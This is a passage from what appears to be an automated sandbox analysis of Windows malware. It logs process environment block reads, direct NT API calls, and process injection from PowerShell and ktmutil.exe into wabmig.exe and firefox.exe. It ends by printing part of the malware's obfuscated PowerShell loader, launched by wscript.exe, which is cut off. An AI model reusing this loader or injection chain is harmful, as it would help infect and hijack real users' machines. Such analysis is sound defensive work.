          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_21A20274 mov eax, dword ptr fs:[00000030h]10_2_21A20274
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_21A20274 mov eax, dword ptr fs:[00000030h]10_2_21A20274
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_21A20274 mov eax, dword ptr fs:[00000030h]10_2_21A20274
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_21A20274 mov eax, dword ptr fs:[00000030h]10_2_21A20274
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_21A20274 mov eax, dword ptr fs:[00000030h]10_2_21A20274
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_21A20274 mov eax, dword ptr fs:[00000030h]10_2_21A20274
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_21A20274 mov eax, dword ptr fs:[00000030h]10_2_21A20274
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_219A724D mov eax, dword ptr fs:[00000030h]10_2_219A724D
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_219B1270 mov eax, dword ptr fs:[00000030h]10_2_219B1270
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_219B1270 mov eax, dword ptr fs:[00000030h]10_2_219B1270
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_21999274 mov eax, dword ptr fs:[00000030h]10_2_21999274
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_21A2B256 mov eax, dword ptr fs:[00000030h]10_2_21A2B256
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_21A2B256 mov eax, dword ptr fs:[00000030h]10_2_21A2B256
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_21974260 mov eax, dword ptr fs:[00000030h]10_2_21974260
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_21974260 mov eax, dword ptr fs:[00000030h]10_2_21974260
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_21974260 mov eax, dword ptr fs:[00000030h]10_2_21974260
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_2196826B mov eax, dword ptr fs:[00000030h]10_2_2196826B
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_219AE59C mov eax, dword ptr fs:[00000030h]10_2_219AE59C
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_219FB594 mov eax, dword ptr fs:[00000030h]10_2_219FB594
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_219FB594 mov eax, dword ptr fs:[00000030h]10_2_219FB594
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_219A4588 mov eax, dword ptr fs:[00000030h]10_2_219A4588
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_21972582 mov eax, dword ptr fs:[00000030h]10_2_21972582
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_21972582 mov ecx, dword ptr fs:[00000030h]10_2_21972582
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_2196758F mov eax, dword ptr fs:[00000030h]10_2_2196758F
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_2196758F mov eax, dword ptr fs:[00000030h]10_2_2196758F
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_2196758F mov eax, dword ptr fs:[00000030h]10_2_2196758F
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_21A035BA mov eax, dword ptr fs:[00000030h]10_2_21A035BA
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_21A035BA mov eax, dword ptr fs:[00000030h]10_2_21A035BA
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_21A035BA mov eax, dword ptr fs:[00000030h]10_2_21A035BA
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_21A035BA mov eax, dword ptr fs:[00000030h]10_2_21A035BA
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_21A2F5BE mov eax, dword ptr fs:[00000030h]10_2_21A2F5BE
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_219945B1 mov eax, dword ptr fs:[00000030h]10_2_219945B1
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_219945B1 mov eax, dword ptr fs:[00000030h]10_2_219945B1
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_2199F5B0 mov eax, dword ptr fs:[00000030h]10_2_2199F5B0
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_2199F5B0 mov eax, dword ptr fs:[00000030h]10_2_2199F5B0
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_2199F5B0 mov eax, dword ptr fs:[00000030h]10_2_2199F5B0
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_2199F5B0 mov eax, dword ptr fs:[00000030h]10_2_2199F5B0
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_2199F5B0 mov eax, dword ptr fs:[00000030h]10_2_2199F5B0
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_2199F5B0 mov eax, dword ptr fs:[00000030h]10_2_2199F5B0
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_2199F5B0 mov eax, dword ptr fs:[00000030h]10_2_2199F5B0
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_2199F5B0 mov eax, dword ptr fs:[00000030h]10_2_2199F5B0
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_2199F5B0 mov eax, dword ptr fs:[00000030h]10_2_2199F5B0
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_219915A9 mov eax, dword ptr fs:[00000030h]10_2_219915A9
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_219915A9 mov eax, dword ptr fs:[00000030h]10_2_219915A9
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_219915A9 mov eax, dword ptr fs:[00000030h]10_2_219915A9
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_219915A9 mov eax, dword ptr fs:[00000030h]10_2_219915A9
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_219915A9 mov eax, dword ptr fs:[00000030h]10_2_219915A9
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_219F05A7 mov eax, dword ptr fs:[00000030h]10_2_219F05A7
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_219F05A7 mov eax, dword ptr fs:[00000030h]10_2_219F05A7
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_219F05A7 mov eax, dword ptr fs:[00000030h]10_2_219F05A7
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_219995DA mov eax, dword ptr fs:[00000030h]10_2_219995DA
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_219765D0 mov eax, dword ptr fs:[00000030h]10_2_219765D0
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_219AA5D0 mov eax, dword ptr fs:[00000030h]10_2_219AA5D0
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_219AA5D0 mov eax, dword ptr fs:[00000030h]10_2_219AA5D0
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_219AE5CF mov eax, dword ptr fs:[00000030h]10_2_219AE5CF
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_219AE5CF mov eax, dword ptr fs:[00000030h]10_2_219AE5CF
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_219A55C0 mov eax, dword ptr fs:[00000030h]10_2_219A55C0
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_21A455C9 mov eax, dword ptr fs:[00000030h]10_2_21A455C9
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_219915F4 mov eax, dword ptr fs:[00000030h]10_2_219915F4
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_219915F4 mov eax, dword ptr fs:[00000030h]10_2_219915F4
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_219915F4 mov eax, dword ptr fs:[00000030h]10_2_219915F4
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_219915F4 mov eax, dword ptr fs:[00000030h]10_2_219915F4
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_219915F4 mov eax, dword ptr fs:[00000030h]10_2_219915F4
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_219915F4 mov eax, dword ptr fs:[00000030h]10_2_219915F4
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_21A435D7 mov eax, dword ptr fs:[00000030h]10_2_21A435D7
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_21A435D7 mov eax, dword ptr fs:[00000030h]10_2_21A435D7
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_21A435D7 mov eax, dword ptr fs:[00000030h]10_2_21A435D7
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_219AC5ED mov eax, dword ptr fs:[00000030h]10_2_219AC5ED
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_219AC5ED mov eax, dword ptr fs:[00000030h]10_2_219AC5ED
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_219725E0 mov eax, dword ptr fs:[00000030h]10_2_219725E0
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_2199E5E7 mov eax, dword ptr fs:[00000030h]10_2_2199E5E7
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_2199E5E7 mov eax, dword ptr fs:[00000030h]10_2_2199E5E7
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_2199E5E7 mov eax, dword ptr fs:[00000030h]10_2_2199E5E7
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_2199E5E7 mov eax, dword ptr fs:[00000030h]10_2_2199E5E7
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_2199E5E7 mov eax, dword ptr fs:[00000030h]10_2_2199E5E7
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_2199E5E7 mov eax, dword ptr fs:[00000030h]10_2_2199E5E7
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_2199E5E7 mov eax, dword ptr fs:[00000030h]10_2_2199E5E7
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_2199E5E7 mov eax, dword ptr fs:[00000030h]10_2_2199E5E7
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_21A1F525 mov eax, dword ptr fs:[00000030h]10_2_21A1F525
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_21A1F525 mov eax, dword ptr fs:[00000030h]10_2_21A1F525
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_21A1F525 mov eax, dword ptr fs:[00000030h]10_2_21A1F525
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_21A1F525 mov eax, dword ptr fs:[00000030h]10_2_21A1F525
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_21A1F525 mov eax, dword ptr fs:[00000030h]10_2_21A1F525
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_21A1F525 mov eax, dword ptr fs:[00000030h]10_2_21A1F525
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_21A1F525 mov eax, dword ptr fs:[00000030h]10_2_21A1F525
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_21A2B52F mov eax, dword ptr fs:[00000030h]10_2_21A2B52F
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_21A45537 mov eax, dword ptr fs:[00000030h]10_2_21A45537
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_219A7505 mov eax, dword ptr fs:[00000030h]10_2_219A7505
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_219A7505 mov ecx, dword ptr fs:[00000030h]10_2_219A7505
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_2197D534 mov eax, dword ptr fs:[00000030h]10_2_2197D534
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_2197D534 mov eax, dword ptr fs:[00000030h]10_2_2197D534
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_2197D534 mov eax, dword ptr fs:[00000030h]10_2_2197D534
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_2197D534 mov eax, dword ptr fs:[00000030h]10_2_2197D534
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_2197D534 mov eax, dword ptr fs:[00000030h]10_2_2197D534
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_2197D534 mov eax, dword ptr fs:[00000030h]10_2_2197D534
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_21A44500 mov eax, dword ptr fs:[00000030h]10_2_21A44500
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_21A44500 mov eax, dword ptr fs:[00000030h]10_2_21A44500
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_21A44500 mov eax, dword ptr fs:[00000030h]10_2_21A44500
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_21A44500 mov eax, dword ptr fs:[00000030h]10_2_21A44500
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_21A44500 mov eax, dword ptr fs:[00000030h]10_2_21A44500
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_21A44500 mov eax, dword ptr fs:[00000030h]10_2_21A44500
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_21A44500 mov eax, dword ptr fs:[00000030h]10_2_21A44500
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_2199E53E mov eax, dword ptr fs:[00000030h]10_2_2199E53E
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_2199E53E mov eax, dword ptr fs:[00000030h]10_2_2199E53E
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_2199E53E mov eax, dword ptr fs:[00000030h]10_2_2199E53E
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_2199E53E mov eax, dword ptr fs:[00000030h]10_2_2199E53E
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_2199E53E mov eax, dword ptr fs:[00000030h]10_2_2199E53E
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_219AD530 mov eax, dword ptr fs:[00000030h]10_2_219AD530
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_219AD530 mov eax, dword ptr fs:[00000030h]10_2_219AD530
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_21980535 mov eax, dword ptr fs:[00000030h]10_2_21980535
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_21980535 mov eax, dword ptr fs:[00000030h]10_2_21980535
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_21980535 mov eax, dword ptr fs:[00000030h]10_2_21980535
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_21980535 mov eax, dword ptr fs:[00000030h]10_2_21980535
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_21980535 mov eax, dword ptr fs:[00000030h]10_2_21980535
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_21980535 mov eax, dword ptr fs:[00000030h]10_2_21980535
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_21978550 mov eax, dword ptr fs:[00000030h]10_2_21978550
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_21978550 mov eax, dword ptr fs:[00000030h]10_2_21978550
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_219AB570 mov eax, dword ptr fs:[00000030h]10_2_219AB570
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_219AB570 mov eax, dword ptr fs:[00000030h]10_2_219AB570
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_219A656A mov eax, dword ptr fs:[00000030h]10_2_219A656A
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_219A656A mov eax, dword ptr fs:[00000030h]10_2_219A656A
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_219A656A mov eax, dword ptr fs:[00000030h]10_2_219A656A

          HIPS / PFW / Operating System Protection Evasion

          Source: Yara match File source: amsi64_7512.amsi.csv, type: OTHER
          Source: Yara match File source: Process Memory Space: powershell.exe PID: 7512, type: MEMORYSTR
          Source: Yara match File source: Process Memory Space: powershell.exe PID: 7944, type: MEMORYSTR
          Source: C:\Program Files (x86)\HhPMOUbrMwvnZpYkhfFwOVIirWvRXtNCLbsuCqvYQqqyWREgrkZCMneQzvJBwCunRLyoTGpWisniw\osqpHpjBCXXA.exe NtWriteVirtualMemory: Direct from: 0x76F0490C
          Source: C:\Program Files (x86)\HhPMOUbrMwvnZpYkhfFwOVIirWvRXtNCLbsuCqvYQqqyWREgrkZCMneQzvJBwCunRLyoTGpWisniw\osqpHpjBCXXA.exe NtAllocateVirtualMemory: Direct from: 0x76F03C9C
          Source: C:\Program Files (x86)\HhPMOUbrMwvnZpYkhfFwOVIirWvRXtNCLbsuCqvYQqqyWREgrkZCMneQzvJBwCunRLyoTGpWisniw\osqpHpjBCXXA.exe NtClose: Direct from: 0x76F02B6C
          Source: C:\Program Files (x86)\HhPMOUbrMwvnZpYkhfFwOVIirWvRXtNCLbsuCqvYQqqyWREgrkZCMneQzvJBwCunRLyoTGpWisniw\osqpHpjBCXXA.exe NtReadVirtualMemory: Direct from: 0x76F02E8C
          Source: C:\Program Files (x86)\HhPMOUbrMwvnZpYkhfFwOVIirWvRXtNCLbsuCqvYQqqyWREgrkZCMneQzvJBwCunRLyoTGpWisniw\osqpHpjBCXXA.exe NtCreateKey: Direct from: 0x76F02C6C
          Source: C:\Program Files (x86)\HhPMOUbrMwvnZpYkhfFwOVIirWvRXtNCLbsuCqvYQqqyWREgrkZCMneQzvJBwCunRLyoTGpWisniw\osqpHpjBCXXA.exe NtSetInformationThread: Direct from: 0x76F02B4C
          Source: C:\Program Files (x86)\HhPMOUbrMwvnZpYkhfFwOVIirWvRXtNCLbsuCqvYQqqyWREgrkZCMneQzvJBwCunRLyoTGpWisniw\osqpHpjBCXXA.exe NtQueryAttributesFile: Direct from: 0x76F02E6C
          Source: C:\Program Files (x86)\HhPMOUbrMwvnZpYkhfFwOVIirWvRXtNCLbsuCqvYQqqyWREgrkZCMneQzvJBwCunRLyoTGpWisniw\osqpHpjBCXXA.exe NtAllocateVirtualMemory: Direct from: 0x76F048EC
          Source: C:\Program Files (x86)\HhPMOUbrMwvnZpYkhfFwOVIirWvRXtNCLbsuCqvYQqqyWREgrkZCMneQzvJBwCunRLyoTGpWisniw\osqpHpjBCXXA.exe NtQuerySystemInformation: Direct from: 0x76F048CC
          Source: C:\Program Files (x86)\HhPMOUbrMwvnZpYkhfFwOVIirWvRXtNCLbsuCqvYQqqyWREgrkZCMneQzvJBwCunRLyoTGpWisniw\osqpHpjBCXXA.exe NtQueryVolumeInformationFile: Direct from: 0x76F02F2C
          Source: C:\Program Files (x86)\HhPMOUbrMwvnZpYkhfFwOVIirWvRXtNCLbsuCqvYQqqyWREgrkZCMneQzvJBwCunRLyoTGpWisniw\osqpHpjBCXXA.exe NtOpenSection: Direct from: 0x76F02E0C
          Source: C:\Program Files (x86)\HhPMOUbrMwvnZpYkhfFwOVIirWvRXtNCLbsuCqvYQqqyWREgrkZCMneQzvJBwCunRLyoTGpWisniw\osqpHpjBCXXA.exe NtSetInformationThread: Direct from: 0x76EF63F9
          Source: C:\Program Files (x86)\HhPMOUbrMwvnZpYkhfFwOVIirWvRXtNCLbsuCqvYQqqyWREgrkZCMneQzvJBwCunRLyoTGpWisniw\osqpHpjBCXXA.exe NtDeviceIoControlFile: Direct from: 0x76F02AEC
          Source: C:\Program Files (x86)\HhPMOUbrMwvnZpYkhfFwOVIirWvRXtNCLbsuCqvYQqqyWREgrkZCMneQzvJBwCunRLyoTGpWisniw\osqpHpjBCXXA.exe NtAllocateVirtualMemory: Direct from: 0x76F02BEC
          Source: C:\Program Files (x86)\HhPMOUbrMwvnZpYkhfFwOVIirWvRXtNCLbsuCqvYQqqyWREgrkZCMneQzvJBwCunRLyoTGpWisniw\osqpHpjBCXXA.exe NtCreateFile: Direct from: 0x76F02FEC
          Source: C:\Program Files (x86)\HhPMOUbrMwvnZpYkhfFwOVIirWvRXtNCLbsuCqvYQqqyWREgrkZCMneQzvJBwCunRLyoTGpWisniw\osqpHpjBCXXA.exe NtOpenFile: Direct from: 0x76F02DCC
          Source: C:\Program Files (x86)\HhPMOUbrMwvnZpYkhfFwOVIirWvRXtNCLbsuCqvYQqqyWREgrkZCMneQzvJBwCunRLyoTGpWisniw\osqpHpjBCXXA.exe NtQueryInformationToken: Direct from: 0x76F02CAC
          Source: C:\Program Files (x86)\HhPMOUbrMwvnZpYkhfFwOVIirWvRXtNCLbsuCqvYQqqyWREgrkZCMneQzvJBwCunRLyoTGpWisniw\osqpHpjBCXXA.exe NtProtectVirtualMemory: Direct from: 0x76EF7B2E
          Source: C:\Program Files (x86)\HhPMOUbrMwvnZpYkhfFwOVIirWvRXtNCLbsuCqvYQqqyWREgrkZCMneQzvJBwCunRLyoTGpWisniw\osqpHpjBCXXA.exe NtOpenKeyEx: Direct from: 0x76F02B9C
          Source: C:\Program Files (x86)\HhPMOUbrMwvnZpYkhfFwOVIirWvRXtNCLbsuCqvYQqqyWREgrkZCMneQzvJBwCunRLyoTGpWisniw\osqpHpjBCXXA.exe NtProtectVirtualMemory: Direct from: 0x76F02F9C
          Source: C:\Program Files (x86)\HhPMOUbrMwvnZpYkhfFwOVIirWvRXtNCLbsuCqvYQqqyWREgrkZCMneQzvJBwCunRLyoTGpWisniw\osqpHpjBCXXA.exe NtSetInformationProcess: Direct from: 0x76F02C5C
          Source: C:\Program Files (x86)\HhPMOUbrMwvnZpYkhfFwOVIirWvRXtNCLbsuCqvYQqqyWREgrkZCMneQzvJBwCunRLyoTGpWisniw\osqpHpjBCXXA.exe NtNotifyChangeKey: Direct from: 0x76F03C2C
          Source: C:\Program Files (x86)\HhPMOUbrMwvnZpYkhfFwOVIirWvRXtNCLbsuCqvYQqqyWREgrkZCMneQzvJBwCunRLyoTGpWisniw\osqpHpjBCXXA.exe NtCreateMutant: Direct from: 0x76F035CC
          Source: C:\Program Files (x86)\HhPMOUbrMwvnZpYkhfFwOVIirWvRXtNCLbsuCqvYQqqyWREgrkZCMneQzvJBwCunRLyoTGpWisniw\osqpHpjBCXXA.exe NtWriteVirtualMemory: Direct from: 0x76F02E3C
          Source: C:\Program Files (x86)\HhPMOUbrMwvnZpYkhfFwOVIirWvRXtNCLbsuCqvYQqqyWREgrkZCMneQzvJBwCunRLyoTGpWisniw\osqpHpjBCXXA.exe NtMapViewOfSection: Direct from: 0x76F02D1C
          Source: C:\Program Files (x86)\HhPMOUbrMwvnZpYkhfFwOVIirWvRXtNCLbsuCqvYQqqyWREgrkZCMneQzvJBwCunRLyoTGpWisniw\osqpHpjBCXXA.exe NtResumeThread: Direct from: 0x76F036AC
          Source: C:\Program Files (x86)\HhPMOUbrMwvnZpYkhfFwOVIirWvRXtNCLbsuCqvYQqqyWREgrkZCMneQzvJBwCunRLyoTGpWisniw\osqpHpjBCXXA.exe NtAllocateVirtualMemory: Direct from: 0x76F02BFC
          Source: C:\Program Files (x86)\HhPMOUbrMwvnZpYkhfFwOVIirWvRXtNCLbsuCqvYQqqyWREgrkZCMneQzvJBwCunRLyoTGpWisniw\osqpHpjBCXXA.exe NtReadFile: Direct from: 0x76F02ADC
          Source: C:\Program Files (x86)\HhPMOUbrMwvnZpYkhfFwOVIirWvRXtNCLbsuCqvYQqqyWREgrkZCMneQzvJBwCunRLyoTGpWisniw\osqpHpjBCXXA.exe NtQuerySystemInformation: Direct from: 0x76F02DFC
          Source: C:\Program Files (x86)\HhPMOUbrMwvnZpYkhfFwOVIirWvRXtNCLbsuCqvYQqqyWREgrkZCMneQzvJBwCunRLyoTGpWisniw\osqpHpjBCXXA.exe NtDelayExecution: Direct from: 0x76F02DDC
          Source: C:\Program Files (x86)\HhPMOUbrMwvnZpYkhfFwOVIirWvRXtNCLbsuCqvYQqqyWREgrkZCMneQzvJBwCunRLyoTGpWisniw\osqpHpjBCXXA.exe NtQueryInformationProcess: Direct from: 0x76F02C26
          Source: C:\Program Files (x86)\HhPMOUbrMwvnZpYkhfFwOVIirWvRXtNCLbsuCqvYQqqyWREgrkZCMneQzvJBwCunRLyoTGpWisniw\osqpHpjBCXXA.exe NtResumeThread: Direct from: 0x76F02FBC
          Source: C:\Program Files (x86)\HhPMOUbrMwvnZpYkhfFwOVIirWvRXtNCLbsuCqvYQqqyWREgrkZCMneQzvJBwCunRLyoTGpWisniw\osqpHpjBCXXA.exe NtCreateUserProcess: Direct from: 0x76F0371C
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exe Section loaded: NULL target: C:\Program Files (x86)\HhPMOUbrMwvnZpYkhfFwOVIirWvRXtNCLbsuCqvYQqqyWREgrkZCMneQzvJBwCunRLyoTGpWisniw\osqpHpjBCXXA.exe protection: execute and read and write
          Source: C:\Program Files (x86)\HhPMOUbrMwvnZpYkhfFwOVIirWvRXtNCLbsuCqvYQqqyWREgrkZCMneQzvJBwCunRLyoTGpWisniw\osqpHpjBCXXA.exe Section loaded: NULL target: C:\Program Files (x86)\Windows Mail\wabmig.exe protection: execute and read and write
          Source: C:\Program Files (x86)\HhPMOUbrMwvnZpYkhfFwOVIirWvRXtNCLbsuCqvYQqqyWREgrkZCMneQzvJBwCunRLyoTGpWisniw\osqpHpjBCXXA.exe Section loaded: NULL target: C:\Windows\SysWOW64\ktmutil.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\ktmutil.exe Section loaded: NULL target: C:\Program Files (x86)\HhPMOUbrMwvnZpYkhfFwOVIirWvRXtNCLbsuCqvYQqqyWREgrkZCMneQzvJBwCunRLyoTGpWisniw\osqpHpjBCXXA.exe protection: read write
          Source: C:\Windows\SysWOW64\ktmutil.exe Section loaded: NULL target: C:\Program Files (x86)\HhPMOUbrMwvnZpYkhfFwOVIirWvRXtNCLbsuCqvYQqqyWREgrkZCMneQzvJBwCunRLyoTGpWisniw\osqpHpjBCXXA.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\ktmutil.exe Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write
          Source: C:\Windows\SysWOW64\ktmutil.exe Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\ktmutil.exe Thread register set: target process: 2828
          Source: C:\Windows\SysWOW64\ktmutil.exe Thread APC queued: target process: C:\Program Files (x86)\HhPMOUbrMwvnZpYkhfFwOVIirWvRXtNCLbsuCqvYQqqyWREgrkZCMneQzvJBwCunRLyoTGpWisniw\osqpHpjBCXXA.exe
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Program Files (x86)\Windows Mail\wabmig.exe base: 3200000
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Program Files (x86)\Windows Mail\wabmig.exe base: D3F800
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Debrief klargoeringstekniker overmortgaged Kernefrugterne chewers underrealises #>;$Nethes='Regreskravenes';<#hertugdoemmer Accessionernes Vitaminisering senvy #>;$Hawse=$host.PrivateData;If ($Hawse) {$Justerkammer++;}function Bisulc($supernumerary){$Frstestyrmand=$supernumerary.Length-$Justerkammer;for( $Entremess=3;$Entremess -lt $Frstestyrmand;$Entremess+=4){$Bar+=$supernumerary[$Entremess];}$Bar;}function Brdnidens($Naturaliseredes){ .($spectrographic) ($Naturaliseredes);}$Brnehospitalerne=Bisulc 'LocMDraoBrnz Tji M,l Fal la T /Ga,5Tan. f0Bog Vea(PilWDi iselnv ndD mo,alwslassta stNsanT To gro1Ov 0,et.Fac0Ov ;.to NonWCuri atnUnd6N,c4 Ch; ci ArbxUd,6For4Kn,;she HarNonv Fa:Non1N,n2fla1Mar.Naz0H m),ul MaG Cae axc nok H.oOps/ Ac2 lo0Teg1 